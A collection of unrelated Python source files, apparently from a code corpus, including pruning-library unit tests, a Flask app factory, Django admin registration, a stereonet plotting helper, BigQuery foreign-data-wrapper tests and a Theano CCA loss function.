output_channels_gt[2*simp_block_idx+1] - delta else: output_channels_gt[2*simp_block_idx] = output_channels_gt[2*simp_block_idx] - delta input_channels_gt[2*simp_block_idx+1] = input_channels_gt[2*simp_block_idx+1] - delta return input_channels_gt, output_channels_gt def run_simplify_network_def_and_check_for_one_resource_type(self, constraint, resource_type, simp_block_indices, delta, res_gt): network_def = network_utils.get_network_def_from_model(model) for i in range(len(simp_block_indices)): simp_block_idx = simp_block_indices[i] simp_network_def, simp_resource = network_utils.simplify_network_def_based_on_constraint(network_def, simp_block_idx, constraint, resource_type) self.assertEqual(simp_resource, res_gt[i], "Simplified network resource {} error".format(resource_type)) input_channels_gt, output_channels_gt = self.delta_to_layer_num_channels(delta[i], simp_block_idx) self.check_network_def(simp_network_def, input_channels_gt, output_channels_gt, only_num_channels=True) def test_simplify_network_def_based_on_constraint(self): total_num_w = 3195328 total_num_mac = 567726592 constraint_num_w = total_num_w*0.975 constraint_num_mac = total_num_mac*0.975 simp_block_indices = [0, 1, 5, 7, 9, 11, 13] delta_w = [24, 56, 104, 80, 80, 56, 80] delta_mac = [16, 24, 48, 72, 72, 96, 288] num_w_gt = [3192928, 3185864, 3114520, 3112688, 3112688, 3108808, 3112608] num_mac_gt = [547656192, 547781632, 553191232, 553148896, 553148896, 553233568, 553273024] self.run_simplify_network_def_and_check_for_one_resource_type(constraint=constraint_num_w, resource_type="WEIGHTS", simp_block_indices=simp_block_indices, delta=delta_w, res_gt=num_w_gt) self.run_simplify_network_def_and_check_for_one_resource_type(constraint=constraint_num_mac, resource_type="FLOPS", simp_block_indices=simp_block_indices, delta=delta_mac, res_gt=num_mac_gt) def test_simplify_model_based_on_network_def(self): network_def = network_utils.get_network_def_from_model(model) total_num_w = 3195328 constraint_num_w = total_num_w*0.975 simp_block_indices = [0, 1, 5, 7, 9, 11, 13] delta_w = [24, 56, 104, 80, 80, 56, 80] topk_w = [8, 8, 152, 432, 432, 456, 944] for i in range(len(simp_block_indices)): simp_block_idx = simp_block_indices[i] simp_network_def, _ = network_utils.simplify_network_def_based_on_constraint(network_def, simp_block_idx, constraint_num_w, "WEIGHTS") simp_model = network_utils.simplify_model_based_on_network_def(simp_network_def, model) updated_network_def = network_utils.get_network_def_from_model(simp_model) input_channels_gt, output_channels_gt = self.delta_to_layer_num_channels(delta_w[i], simp_block_idx) self.check_network_def(updated_network_def, input_channels_gt, output_channels_gt) conv_layers = getattr(model, 'model') simp_conv_layers = getattr(simp_model, 'model') for block_idx in range(14): module = getattr(conv_layers, str(block_idx)) simp_module = getattr(simp_conv_layers, str(block_idx)) if block_idx != simp_block_idx and block_idx != simp_block_idx + 1: if block_idx != 0: for layer_idx in ['0', '1', '3', '4']: layer = getattr(module, layer_idx) simp_layer = getattr(simp_module, layer_idx) if layer_idx in ['0', '3']: equal = (simp_layer.weight.data == layer.weight.data) self.assertTrue(equal.min(), "simplify_model_based_on_network_def modify unrelated conv layers") else: equal_weight = (simp_layer.weight.data == layer.weight.data) equal_bias = (simp_layer.bias.data == layer.bias.data) equal_num_features = (simp_layer.num_features == layer.num_features) self.assertTrue(equal_weight.min(), "simplify_model_based_on_network_def modify unrelated batchnorm layers (weight)") self.assertTrue(equal_bias.min(), "simplify_model_based_on_network_def modify unrelated batchnorm layers (bias)") self.assertTrue(equal_num_features, "simplify_model_based_on_network_def modify unrelated batchnorm layers (num_features)") else: layer = getattr(module, '0') simp_layer = getattr(simp_module, '0') equal = (simp_layer.weight.data == layer.weight.data) self.assertTrue(equal.min(), "simplify_model_based_on_network_def modify unrelated conv layers") layer = getattr(module, '1') simp_layer = getattr(simp_module, '1') equal_weight = (simp_layer.weight.data == layer.weight.data) equal_bias = (simp_layer.bias.data == layer.bias.data) equal_num_features = (simp_layer.num_features == layer.num_features) self.assertTrue(equal_weight.min(), "simplify_model_based_on_network_def modify unrelated batchnorm layers (weight)") self.assertTrue(equal_bias.min(), "simplify_model_based_on_network_def modify unrelated batchnorm layers (bias)") self.assertTrue(equal_num_features, "simplify_model_based_on_network_def modify unrelated batchnorm layers (num_features)") elif block_idx == simp_block_idx: # check (regular/pointwise layer output channels and input channels of the next depthwise layer) # or check (pointwise layer output channels and nput features of the next FC layer) if block_idx == 0: layer = getattr(module, '0') simp_layer = getattr(simp_module, '0') else: # pointwise # first check depthwise layer within the same block layer = getattr(module, '0') simp_layer = getattr(module, '0') equal_dep = (layer.weight.data == simp_layer.weight.data) self.assertTrue(equal_dep.min(), "Depthwise layer within the target block error") layer = getattr(module, '3') simp_layer = getattr(simp_module, '3') layer_weight = layer.weight.data weight_vector = layer_weight.view(layer_weight.shape[0], -1) weight_norm = weight_vector*weight_vector weight_norm = torch.sum(weight_norm, dim=1) _, kept_filter_idx = torch.topk(weight_norm, topk_w[i], sorted=False) kept_filter_idx, _ = kept_filter_idx.sort() weight_gt = layer_weight[kept_filter_idx, :, :, :] weight_simp = simp_layer.weight.data equal_weight = (weight_gt == weight_simp) self.assertTrue(equal_weight.min(), "Output channels of the pruned layer error") # modify input channels of the next few layers if block_idx != 13: # depthwise -> batchnorm -> pointwise next_module = getattr(conv_layers, str(block_idx+1)) simp_next_module = getattr(simp_conv_layers, str(block_idx+1)) dep_layer = getattr(next_module, '0') simp_dep_layer = getattr(simp_next_module, '0') dep_layer_weight = dep_layer.weight.data[kept_filter_idx, :, :, :] equal_dep_weights = (dep_layer_weight == simp_dep_layer.weight.data) self.assertTrue(equal_dep_weights.min(), "Input channels of the depthwise layer after pruned layers error") batchnorm_layer = getattr(next_module, '1') simp_batchnorm_layer = getattr(simp_next_module, '1') batchnorm_layer_weight = batchnorm_layer.weight.data[kept_filter_idx] equal_batchnorm_weights = (batchnorm_layer_weight == simp_batchnorm_layer.weight.data) self.assertTrue(equal_batchnorm_weights.min(), "Weights of the batchnorm layer after pruned layers error") batchnorm_layer_bias = batchnorm_layer.bias.data[kept_filter_idx] equal_batchnorm_bias = (batchnorm_layer_bias == simp_batchnorm_layer.bias.data) self.assertTrue(equal_batchnorm_bias.min(), "Biases of the batchnorm layer after pruned layers error") equal_batchnorm_num_features = (len(kept_filter_idx) == simp_batchnorm_layer.num_features) self.assertTrue(equal_batchnorm_num_features, "Number of features of the batchnorm layer after pruned layers error") pt_layer = getattr(next_module, '3') simp_pt_layer = getattr(simp_next_module, '3') pt_layer_weight = pt_layer.weight.data[:, kept_filter_idx, :, :] equal_pt_weights = (pt_layer_weight == simp_pt_layer.weight.data) self.assertTrue(equal_pt_weights.min(), "Input channels of the pointwise layer after pruned layers error") else: # FC fc_layer = getattr(model, 'fc') simp_fc_layer = getattr(simp_model, 'fc') fc_layer_weight = fc_layer.weight.data fc_layer_weight = fc_layer_weight[:, kept_filter_idx] equal_fc_weights = (fc_layer_weight == simp_fc_layer.weight.data) self.assertTrue(equal_fc_weights.min(), "Input features of FC layer error") def test_simplify_model_based_on_network_def_check_weights(self): # make sure we prune the correct filters by checking the weights of a pruned model # the weights of the original model are initialized to certain values total_num_w = 3195328 constraint_num_w = total_num_w*0.975 simp_block_indices = [0, 1, 5, 7, 9, 11, 13] delta_w = [24, 56, 104, 80, 80, 56, 80] topk_w = [8, 8, 152, 432, 432, 456, 944] # initialze model weights model_init = copy.deepcopy(model) conv_layers = getattr(model_init, 'model') for block_idx in range(14): module = getattr(conv_layers, str(block_idx)) # regular/depthwise layer = getattr(module, '0') layer.weight.data = self.gen_layer_weight(layer.weight.data) if block_idx != 0: # pointwise layer = getattr(module, '3') layer.weight.data = self.gen_layer_weight(layer.weight.data) model_init.fc.weight.data = self.gen_layer_weight(model_init.fc.weight.data) network_def = network_utils.get_network_def_from_model(model_init) for i in range(len(simp_block_indices)): simp_block_idx = simp_block_indices[i] simp_network_def, _ = network_utils.simplify_network_def_based_on_constraint(network_def, simp_block_idx, constraint_num_w, "WEIGHTS") simp_model = network_utils.simplify_model_based_on_network_def(simp_network_def, model_init) updated_network_def = network_utils.get_network_def_from_model(simp_model) input_channels_gt, output_channels_gt = self.delta_to_layer_num_channels(delta_w[i], simp_block_idx) self.check_network_def(updated_network_def, input_channels_gt, output_channels_gt) simp_conv_layers = getattr(simp_model, 'model') for block_idx in range(14): if block_idx == simp_block_idx: simp_module = getattr(simp_conv_layers, str(block_idx)) if block_idx == 0: simp_layer = getattr(simp_module, '0') else: # pointwise simp_layer = getattr(simp_module, '3') for weight_idx in range(topk_w[i]): equal_weights = (simp_layer.weight.data[weight_idx, ::] == delta_w[i] + weight_idx) self.assertTrue(equal_weights.min(), "Weights of the pruned layers error") if simp_block_idx != 13: # check the next depthwise layer simp_module = getattr(simp_conv_layers, str(block_idx+1)) simp_layer = getattr(simp_module, '0') for weight_idx in range(topk_w[i]): equal_weights = (simp_layer.weight.data[weight_idx, ::] == delta_w[i] + weight_idx) self.assertTrue(equal_weights.min(), "Weights of the pruned layers error") def test_build_latency_lookup_table(self): network_def = network_utils.get_network_def_from_model(model) lookup_table_path = './unittest_lookup_table.plk' min_conv_feature_size = 32 min_fc_feature_size = 128 measure_latency_batch_size = 1 measure_latency_sample_times = 1 network_utils.build_lookup_table(network_def, 'LATENCY', lookup_table_path, min_conv_feature_size, min_fc_feature_size, measure_latency_batch_size, measure_latency_sample_times) with open(lookup_table_path, 'rb') as file_id: lookup_table = pickle.load(file_id) self.assertEqual(len(lookup_table), 28, "Lookup table length error") input_channels_gt = [3, 32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024] output_channels_gt = [32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024, 10] layer_idx = 0 dep_layer_latency_dict_list = [] pt_layer_latency_dict_list = [] for layer_name, layer_properties in lookup_table.items(): self.assertEqual(layer_properties[KEY_IS_DEPTHWISE], network_def[layer_name][KEY_IS_DEPTHWISE], "lookup table layer properties error (is_depthwise)") self.assertEqual(layer_properties[KEY_NUM_IN_CHANNELS], network_def[layer_name][KEY_NUM_IN_CHANNELS], "lookup table layer properties error (num_in_channels)") self.assertEqual(layer_properties[KEY_NUM_OUT_CHANNELS], network_def[layer_name][KEY_NUM_OUT_CHANNELS], "lookup table layer properties error (num_out_channels)") self.assertEqual(layer_properties[KEY_KERNEL_SIZE], network_def[layer_name][KEY_KERNEL_SIZE], "lookup table layer properties error (kernel_size)") self.assertEqual(layer_properties[KEY_STRIDE], network_def[layer_name][KEY_STRIDE], "lookup table layer properties error (stride)") self.assertEqual(layer_properties[KEY_PADDING], network_def[layer_name][KEY_PADDING], "lookup table layer properties error (padding)") self.assertEqual(layer_properties[KEY_GROUPS], network_def[layer_name][KEY_GROUPS], "lookup table layer properties error (groups)") self.assertEqual(layer_properties[KEY_LAYER_TYPE_STR], network_def[layer_name][KEY_LAYER_TYPE_STR], "lookup table layer properties error (layer_type_str)") self.assertEqual(layer_properties[KEY_INPUT_FEATURE_MAP_SIZE], network_def[layer_name][KEY_INPUT_FEATURE_MAP_SIZE], "lookup table layer properties error (input_feature_size)") layer_latency_table = layer_properties[KEY_LATENCY] num_in_samples = input_channels_gt[layer_idx] num_output_samples = output_channels_gt[layer_idx] if layer_idx != 27: if num_in_samples < min_conv_feature_size: num_in_samples = 1 else: num_in_samples = num_in_samples/min_conv_feature_size num_output_samples = num_output_samples/min_conv_feature_size else: num_in_samples = num_in_samples/min_fc_feature_size if num_output_samples < min_fc_feature_size: num_output_samples = 1 if layer_idx != 27 and layer_idx % 2 == 1: self.assertEqual(len(layer_latency_table), num_in_samples, "Layerwise latency dict length error (layer index: {})".format(layer_idx)) else: self.assertEqual(len(layer_latency_table), num_in_samples*num_output_samples, "Layerwise latency dict length error (layer index: {})".format(layer_idx)) if layer_idx >= 13 and layer_idx <= 22: if layer_idx % 2 == 0: # pointwise layer pt_layer_latency_dict_list.append(layer_latency_table) else: # depthwise layer dep_layer_latency_dict_list.append(layer_latency_table) layer_idx += 1 # check whether same layers have the same results for i in range(1, len(dep_layer_latency_dict_list)): latency_dict_gt = dep_layer_latency_dict_list[0] latency_dict = dep_layer_latency_dict_list[i] for key, value in latency_dict_gt.items(): self.assertEqual(latency_dict_gt[key], latency_dict[key], "Lookup talbe of same depthwise layers ({}) error".format(i)) for i in range(1, len(pt_layer_latency_dict_list)): latency_dict_gt = pt_layer_latency_dict_list[0] latency_dict = pt_layer_latency_dict_list[i] for key, value in latency_dict_gt.items(): self.assertEqual(latency_dict_gt[key], latency_dict[key], "Lookup talbe of same pointwise layers ({}) error".format(i)) os.remove(lookup_table_path) if __name__ == '__main__': unittest.main()
440152
from flask import Flask from flask_compress import Compress from serverpanel.ext.serverinfo import ServerInfo server_info = ServerInfo() compress = Compress() def create_app(config): app = Flask(__name__) app.config.from_object(config) server_info.init_app(app) compress.init_app(app) from serverpanel.controllers import main from serverpanel.controllers import api app.register_blueprint(main) app.register_blueprint(api, url_prefix='/api') return app
440179
import os import numpy as np import matplotlib import matplotlib.pyplot as plt import torch import torchvision import torchvision.transforms as transforms import torch.nn as nn import torch.nn.functional as F import copy import random # https://github.com/facebookresearch/higher imported on Dec 2020 import higher import pickle
440232
import sys,os def get_parent_path(level=1): bundle_dir=os.path.abspath(__file__) for i in range(1,level): bundle_dir=os.path.dirname(bundle_dir) return bundle_dir
440269
from django.contrib import admin from django.db.models import Model from django.template.defaultfilters import pluralize from djedi.admin import cms def register(admin_class): name = admin_class.verbose_name name_plural = getattr(admin_class, 'verbose_name_plural', pluralize(name)) model = type(name, (Model,), { '__module__': __name__, 'Meta': type('Meta', (object,), dict( managed=False, abstract=True, app_label='djedi', verbose_name=name, verbose_name_plural=name_plural )) }) admin.site._registry[model] = admin_class(model, admin.site) register(cms.Admin)
440278
def subplots(nrows=1, ncols=1, sharex=False, sharey=False, squeeze=True, subplot_kw=None, hemisphere='lower', projection='equal_area', **fig_kw): """ Identical to matplotlib.pyplot.subplots, except that this will default to producing equal-area stereonet axes. This prevents constantly doing: >>> fig, ax = plt.subplot(subplot_kw=dict(projection='stereonet')) or >>> fig = plt.figure() >>> ax = fig.add_subplot(111, projection='stereonet') Using this function also avoids having ``mplstereonet`` continually appear to be an unused import when one of the above methods are used. Parameters ----------- nrows : int Number of rows of the subplot grid. Defaults to 1. ncols : int Number of columns of the subplot grid. Defaults to 1. hemisphere : string Currently this has no effect. When upper hemisphere and dual hemisphere plots are implemented, this will control which hemisphere is displayed. projection : string The projection for the axes. Defaults to 'equal_area'--an equal-area (a.k.a. "Schmidtt") stereonet. May also be 'equal_angle' for an equal-angle (a.k.a. "Wulff") stereonet or any other valid matplotlib projection (e.g. 'polar' or 'rectilinear' for a "normal" axes). The following parameters are identical to matplotlib.pyplot.subplots: sharex : string or bool If *True*, the X axis will be shared amongst all subplots. If *True* and you have multiple rows, the x tick labels on all but the last row of plots will have visible set to *False* If a string must be one of "row", "col", "all", or "none". "all" has the same effect as *True*, "none" has the same effect as *False*. If "row", each subplot row will share a X axis. If "col", each subplot column will share a X axis and the x tick labels on all but the last row will have visible set to *False*. sharey : string or bool If *True*, the Y axis will be shared amongst all subplots. If *True* and you have multiple columns, the y tick labels on all but the first column of plots will have visible set to *False* If a string must be one of "row", "col", "all", or "none". "all" has the same effect as *True*, "none" has the same effect as *False*. If "row", each subplot row will share a Y axis. If "col", each subplot column will share a Y axis and the y tick labels on all but the last row will have visible set to *False*. *squeeze* : bool If *True*, extra dimensions are squeezed out from the returned axis object: - if only one subplot is constructed (nrows=ncols=1), the resulting single Axis object is returned as a scalar. - for Nx1 or 1xN subplots, the returned object is a 1-d numpy object array of Axis objects are returned as numpy 1-d arrays. - for NxM subplots with N>1 and M>1 are returned as a 2d array. If *False*, no squeezing at all is done: the returned axis object is always a 2-d array contaning Axis instances, even if it ends up being 1x1. *subplot_kw* : dict Dict with keywords passed to the :meth:`~matplotlib.figure.Figure.add_subplot` call used to create each subplots. *fig_kw* : dict Dict with keywords passed to the :func:`figure` call. Note that all keywords not recognized above will be automatically included here. Returns -------- fig, ax : tuple - *fig* is the :class:`matplotlib.figure.Figure` object - *ax* can be either a single axis object or an array of axis objects if more than one supblot was created. The dimensions of the resulting array can be controlled with the squeeze keyword, see above. """ import matplotlib.pyplot as plt if projection in ['equal_area', 'equal_angle']: projection += '_stereonet' if subplot_kw == None: subplot_kw = {} subplot_kw['projection'] = projection return plt.subplots(nrows, ncols, sharex=sharex, sharey=sharey, squeeze=squeeze, subplot_kw=subplot_kw, **fig_kw)
440303
import unittest from unittest.mock import patch from collections import OrderedDict import datetime import os import multicorn from google.cloud import bigquery from ..bqclient import BqClient from ..fdw import ConstantForeignDataWrapper class Test(unittest.TestCase): def setUp(self): # Set options self.options = { 'fdw_dataset': 'bigquery-public-data.usa_names', 'fdw_table': 'usa_1910_current', 'fdw_verbose': 'true', 'fdw_sql_dialect': 'standard', 'fdw_group': 'false', 'fdw_casting': 'false', } # Set column list (ordered dict of ColumnDefinition from Multicorn) self.columns = OrderedDict([ ('state', multicorn.ColumnDefinition( column_name='state', type_oid=25, base_type_name='text')), ('gender', multicorn.ColumnDefinition( column_name='gender', type_oid=25, base_type_name='text')), ('year', multicorn.ColumnDefinition( column_name='year', type_oid=20, base_type_name='bigint')), ('name', multicorn.ColumnDefinition( column_name='name', type_oid=25, base_type_name='text')), ('number', multicorn.ColumnDefinition( column_name='number', type_oid=20, base_type_name='bigint')) ]) # Define Quals as defined by Multicorn self.quals = [ multicorn.Qual(field_name='number', operator='>', value=1000), multicorn.Qual(field_name='year', operator='=', value=2017), ] # Set instance of ConstantForeignDataWrapper self.fdw = ConstantForeignDataWrapper(self.options, self.columns) def test_setOptions(self): self.assertIsNone(self.fdw.setOptions(self.options)) def test_setOptions_2(self): # Should create a `KeyError` exception which should call log_to_postgres() o = self.options del o['fdw_dataset'] self.assertIsNone(self.fdw.setOptions(o)) def test_setDatatypes(self): self.fdw.setDatatypes() self.assertIsInstance(self.fdw.datatypes, list) for datatype in self.fdw.datatypes: self.assertIsInstance(datatype, tuple) self.assertIsInstance(datatype.postgres, str) self.assertIsInstance(datatype.bq_standard, str) self.assertIsInstance(datatype.bq_legacy, str) def test_setConversionRules(self): self.fdw.setConversionRules() self.assertIsInstance(self.fdw.conversionRules, list) for conversionRule in self.fdw.conversionRules: self.assertIsInstance(conversionRule, tuple) self.assertIsInstance(conversionRule.bq_standard_from, str) self.assertIsInstance(conversionRule.bq_standard_to, list) def test_setOptionSqlDialect(self): self.fdw.setOptionSqlDialect() self.assertEqual(self.fdw.dialect, 'standard') def test_setOptionSqlDialect_2(self): self.fdw.setOptionSqlDialect('legacy') self.assertEqual(self.fdw.dialect, 'legacy') def test_setOptionSqlDialect_3(self): self.fdw.setOptionSqlDialect('non_existent') # Should fallback to `standard` self.assertEqual(self.fdw.dialect, 'standard') def test_setOptionSqlDialect_4(self): self.fdw.verbose = False self.fdw.setOptionSqlDialect() self.assertEqual(self.fdw.dialect, 'standard') def test_setOptionGroupBy(self): self.fdw.setOptionGroupBy('true') self.assertTrue(self.fdw.groupBy) def test_setOptionGroupBy_2(self): self.fdw.setOptionGroupBy('false') self.assertFalse(self.fdw.groupBy) def test_setOptionVerbose(self): self.fdw.setOptionVerbose('true') self.assertTrue(self.fdw.verbose) def test_setOptionVerbose_2(self): self.fdw.setOptionVerbose('false') self.assertFalse(self.fdw.verbose) def test_setOptionCasting(self): # Options are a dict casted as a string casting = '{"column1": "STRING", "column2": "DATE", "column3": "TIMESTAMP"}' self.fdw.setOptionCasting(casting) self.assertIsInstance(self.fdw.castingRules, dict) for column, cast in self.fdw.castingRules.items(): self.assertTrue(column in ['column1', 'column2', 'column3']) self.assertTrue(cast in ['STRING', 'DATE', 'TIMESTAMP']) def test_setOptionCasting_2(self): # Nothing should happen if no casting options have been set casting = '' self.assertIsNone(self.fdw.setOptionCasting(casting)) def test_getClient(self): self.fdw.setClient() self.assertIsInstance(self.fdw.getClient(), BqClient) def test_getClient_2(self): self.fdw.verbose = False self.fdw.setClient() self.assertIsInstance(self.fdw.getClient(), BqClient) def test_setClient(self): self.assertIsInstance(self.fdw.setClient(), BqClient) def test_setClient_2(self): self.fdw.verbose = False self.assertIsInstance(self.fdw.setClient(), BqClient) def test_setClient_3(self): # Should return `None` and call log_to_postgres() if the BigQuery client cannot be set correctly with patch.dict(os.environ, {'GOOGLE_APPLICATION_CREDENTIALS': ''}): self.assertIsNone(self.fdw.setClient()) def test_execute(self): self.fdw.setClient() execute = self.fdw.execute(self.quals, self.columns.keys()) for row in execute: # Ensure that the row is an OrderedDict self.assertIsInstance(row, OrderedDict) # Compare the keys of each row with the expected columns self.assertEqual(set(row.keys()), set( {'state', 'gender', 'year', 'name', 'number'})) def test_buildQuery(self): self.fdw.bq = self.fdw.getClient() query, parameters = self.fdw.buildQuery(self.quals, self.columns) self.assertIsInstance(query, str) self.assertIsInstance(parameters, list) for parameter in parameters: self.assertIsInstance( parameter, bigquery.query.ScalarQueryParameter) def test_buildQuery_2(self): self.fdw.verbose = False self.fdw.bq = self.fdw.getClient() query, parameters = self.fdw.buildQuery(self.quals, self.columns) self.assertIsInstance(query, str) self.assertIsInstance(parameters, list) for parameter in parameters: self.assertIsInstance( parameter, bigquery.query.ScalarQueryParameter) def test_buildQuery_3(self): # Test with grouping option self.fdw.groupBy = True self.fdw.bq = self.fdw.getClient() query, parameters = self.fdw.buildQuery(self.quals, self.columns) self.assertIsInstance(query, str) self.assertIsInstance(parameters, list) for parameter in parameters: self.assertIsInstance( parameter, bigquery.query.ScalarQueryParameter) def test_buildQuery_4(self): # Test with grouping option but no columns sent to buildQuery() self.fdw.groupBy = True self.fdw.bq = self.fdw.getClient() query, parameters = self.fdw.buildQuery(self.quals, None) self.assertIsInstance(query, str) self.assertIsInstance(parameters, list) for parameter in parameters: self.assertIsInstance( parameter, bigquery.query.ScalarQueryParameter) def test_buildColumnList(self): self.assertEqual(self.fdw.buildColumnList( self.columns), 'state as state, gender as gender, year as year, name as name, number as number') def test_buildColumnList_2(self): self.assertEqual(self.fdw.buildColumnList( self.columns, 'GROUP_BY'), 'state , gender , year , name , number') def test_buildColumnList_3(self): # Test with counting pseudo column c = self.columns c['_fdw_count'] = multicorn.ColumnDefinition( column_name='_fdw_count', type_oid=20, base_type_name='bigint') self.assertEqual(self.fdw.buildColumnList( c), 'state as state, gender as gender, year as year, name as name, number as number, count(*) as _fdw_count') def test_buildColumnList_4(self): # Test with counting pseudo column c = self.columns c['_fdw_count'] = multicorn.ColumnDefinition( column_name='_fdw_count', type_oid=20, base_type_name='bigint') self.assertEqual(self.fdw.buildColumnList( c, 'GROUP_BY'), 'state , gender , year , name , number') def test_buildColumnList_5(self): # Test with partition pseudo column c = self.columns c['partition_date'] = multicorn.ColumnDefinition( column_name='partition_date', type_oid=0, base_type_name='date') self.assertEqual(self.fdw.buildColumnList( c), 'state as state, gender as gender, year as year, name as name, number as number, _PARTITIONTIME as partition_date') def test_buildColumnList_6(self): # Test with partition pseudo column c = self.columns c['partition_date'] = multicorn.ColumnDefinition( column_name='partition_date', type_oid=0, base_type_name='date') self.assertEqual(self.fdw.buildColumnList( c, 'GROUP_BY'), 'state , gender , year , name , number , _PARTITIONTIME') def test_buildColumnList_7(self): # Test with a datetime c = self.columns c['datetime'] = multicorn.ColumnDefinition( column_name='datetime', type_oid=0, base_type_name='timestamp without time zone') self.assertEqual(self.fdw.buildColumnList( c, 'GROUP_BY'), 'state , gender , year , name , number , datetime') def test_buildColumnList_8(self): # Test `SELECT *` self.assertEqual(self.fdw.buildColumnList(None), '*') def test_buildColumnList_9(self): # Test no columns when grouping by self.assertEqual(self.fdw.buildColumnList(None, 'GROUP_BY'), '') def test_setTimeZone(self): self.fdw.convertToTz = 'US/Eastern' self.assertEqual(self.fdw.setTimeZone( 'column1', 'DATE').strip(), 'DATE(column1, "US/Eastern")') def test_setTimeZone_2(self): self.fdw.convertToTz = 'US/Eastern' self.assertEqual(self.fdw.setTimeZone( 'column1', 'DATETIME').strip(), 'DATETIME(column1, "US/Eastern")') def test_setTimeZone_3(self): self.fdw.convertToTz = None self.assertEqual(self.fdw.setTimeZone( 'column1', 'DATE').strip(), 'column1') def test_setTimeZone_4(self): self.fdw.convertToTz = None self.assertEqual(self.fdw.setTimeZone( 'column1', 'DATETIME').strip(), 'column1') def test_castColumn(self): # Options are a dict casted as a string casting = '{"number": "STRING"}' self.fdw.setOptionCasting(casting) self.assertEqual(self.fdw.castColumn( 'number', 'number', 'INT64'), 'CAST(number as STRING)') def test_castColumn_2(self): # Options are a dict casted as a string casting = '{"number": "STRING"}' self.fdw.setOptionCasting(casting) # Casting should fail on columns not in the casting rules self.assertEqual(self.fdw.castColumn( 'year', 'year', 'INT64'), 'year') def test_castColumn_3(self): # Options are a dict casted as a string casting = '{"number": "SOME_INVALID_TYPE"}' self.fdw.setOptionCasting(casting) # Casting should fail on invalid types self.assertEqual(self.fdw.castColumn( 'number', 'number', 'INT64'), 'number') def test_castColumn_4(self): # Options are a dict casted as a string casting = '{"number": "STRING"}' self.fdw.setOptionCasting(casting) # Casting should fail on invalid types self.assertEqual(self.fdw.castColumn( 'number', 'number', 'SOME_INVALID_TYPE'), 'number') def test_addColumnAlias(self): self.assertEqual(self.fdw.addColumnAlias( 'some_column'), ' as some_column') def test_addColumnAlias_2(self): self.assertEqual(self.fdw.addColumnAlias( 'some_column', False), '') def test_buildWhereClause(self): self.fdw.bq = self.fdw.getClient() clause, parameters = self.fdw.buildWhereClause(self.quals) self.assertIsInstance(clause, str) self.assertIsInstance(parameters, list) for parameter in parameters: self.assertIsInstance( parameter, bigquery.query.ScalarQueryParameter) def test_buildWhereClause_2(self): # Test with partition pseudo column q = self.quals q.append(multicorn.Qual(field_name='partition_date', operator='=', value=datetime.datetime(2018, 5, 27, 19, 53, 42).date())) self.fdw.bq = self.fdw.getClient() clause, parameters = self.fdw.buildWhereClause(q) self.assertIsInstance(clause, str) self.assertIsInstance(parameters, list) for parameter in parameters: self.assertIsInstance( parameter, bigquery.query.ScalarQueryParameter) def test_buildWhereClause_3(self): # Test with no quals self.fdw.bq = self.fdw.getClient() clause, parameters = self.fdw.buildWhereClause(None) self.assertIsInstance(clause, str) self.assertEqual(clause, '') self.assertIsInstance(parameters, list) self.assertEqual(parameters, []) def test_getOperator(self): self.assertEqual(self.fdw.getOperator('='), '=') def test_getOperator_2(self): self.assertEqual(self.fdw.getOperator('~~'), 'LIKE') def test_getOperator_3(self): self.assertEqual(self.fdw.getOperator('!~~'), 'NOT LIKE') def test_getOperator_4(self): # Test an invalid operator, should return `None` and call log_to_postgres() self.assertIsNone(self.fdw.getOperator('**')) def test_getBigQueryDatatype(self): self.assertEqual(self.fdw.getBigQueryDatatype('number'), 'INT64') def test_getBigQueryDatatype_2(self): self.assertEqual(self.fdw.getBigQueryDatatype( 'number', 'legacy'), 'INTEGER') def test_getBigQueryDatatype_3(self): # Test with a column that has an invalid type c = self.columns c['some_column'] = multicorn.ColumnDefinition( column_name='some_column', type_oid=0, base_type_name='invalid_type') self.fdw.columns = c # Should default to `STRING` self.assertEqual(self.fdw.getBigQueryDatatype('some_column'), 'STRING') def test_setParameter(self): self.fdw.bq = self.fdw.getClient() self.assertIsInstance(self.fdw.setParameter( 'column', 'STRING', 'some string'), bigquery.query.ScalarQueryParameter)
440330
import theano import theano.tensor as T from scipy.io import loadmat import numpy as np from theano.tensor.slinalg import eigvalsh def mcca_loss(N): ''' N - number of modalities (>2) D - dimension of each modality main loss is wrapped into this function ''' def inner_mcca_objective(y_true, y_pred): D = y_pred.shape[1]//N modality_range = [(D*i, (i+1)*D) for i in range(N)] #X = np.dstack((X_[:, i:j] for i,j in modality_range)) m = y_pred.shape[0] #X = y_pred.T Xbar = y_pred.T - (1.0 / m) * T.dot(y_pred.T, T.ones([m, m])) X_Rw = (1.0 / (m-1)) * T.dot(Xbar, Xbar.T) Rw_ = T.zeros([D, D]) Xsum = T.zeros([D, m]) for i,j in modality_range: Rw_ = Rw_ + X_Rw[i:j, i:j] Xsum = Xsum + y_pred.T[i:j, :] Xmean = Xsum/N # total cov Xmean_bar = Xmean - (1.0 / m) * T.dot(Xmean, T.ones([m, m])) Rt_ = ((N * N * 1.0) / (m-1)) * T.dot(Xmean_bar, Xmean_bar.T) Rb_ = (Rt_ - Rw_)/(N - 1) # -- just simple regularization: Rw_ = Rw_ + r1 * T.eye(D) # shrinkage regularize - gamma Rw_reg_ = ((1 - gamma)*Rw_) + (gamma*(Rw_.diagonal().mean())*T.eye(D)) ISC_ = eigvalsh(Rb_, Rw_reg_) l = T.nlinalg.eigh(Rw_reg_, 'L') # do Cholesky to do Generalized Eig Problem L = T.slinalg.cholesky(Rw_reg_) C_ = T.dot(T.nlinalg.matrix_inverse(L), Rb_) C = T.dot(C_, T.nlinalg.matrix_inverse(L).T) C_eigval, C_eigvec = T.nlinalg.eig(C) indx_ = T.argsort(C_eigval)[::-1] W_ = T.dot(T.nlinalg.matrix_inverse(L).T, C_eigvec)[:, indx_] d_ = T.diag(1.0/T.sqrt((W_*W_).sum(axis=0))) W_ = T.dot(W_, d_) # recompute ISC ISC = T.diag(T.dot(T.dot(W_.T, Rb_), W_)) / T.diag(T.dot(T.dot(W_.T, Rw_), W_)) corr = T.sqrt(T.sum(ISC*ISC)) return -1*ISC[0]#-corr return inner_mcca_objective
440333
